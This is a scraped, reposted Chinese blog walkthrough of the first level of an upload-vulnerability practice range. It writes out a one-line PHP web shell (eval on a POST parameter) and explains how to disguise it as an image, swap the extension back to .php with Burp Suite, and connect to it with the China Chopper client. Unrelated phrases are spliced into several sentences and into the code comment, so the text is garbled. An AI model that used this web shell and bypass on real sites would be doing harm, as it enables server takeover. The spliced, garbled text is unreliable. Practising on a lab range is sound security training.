首页 > 作文

upload

更新时间:2023-04-08 20:48:47 阅读: 评论:0

后续关卡

首先,打开靶场,进入第一关

然后先上传一个正常的图片,测试一下靶场安装是否正常

那再上传一个php文件试试。提示不行,只能激励别人的话上传jpg、png、gif类型的文件,说明这一关考的是限制放鞭炮的图片文件上传的类型

那就用php(用其他语言写也行)写个一句话木马,然后将文件后缀改为png之类的

<?phpeval($_POST['123']);//或者eval($_GET['123课题研究报告']);//123是密码,等下会用到,随便取什么值都行?>

点上传文件之前,先给浏览器设置个代理服务器

然后在burp suite里抓包

把文件后缀从png改回php,再发送给服务器

右击刚刚上传的图片,啥都看不到是正常的

选择属性,找到刚刚上传的图片路径地址

在菜刀里找个空白的地方,右击鼠标,选择添加

滚来滚去的小土豆添加好了之后,就会在第一行出现记录

点击与人沟通的技巧它,就能连接后台了

本文地址:https://blog.csdn.net/weixin_45663905/article/details/107528614

本文发布于:2023-04-08 20:48:46,感谢您对本站的认可!

本文链接:https://www.wtabcd.cn/fanwen/zuowen/49fa4908643214c12b3997e17e83a345.html

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。

本文word下载地址:upload.doc

本文 PDF 下载地址:upload.pdf

标签:上传   靶场   文件   图片
相关文章
留言与评论(共有 0 条评论)
   
验证码:
Copyright ©2019-2022 Comsenz Inc.Powered by © 专利检索| 网站地图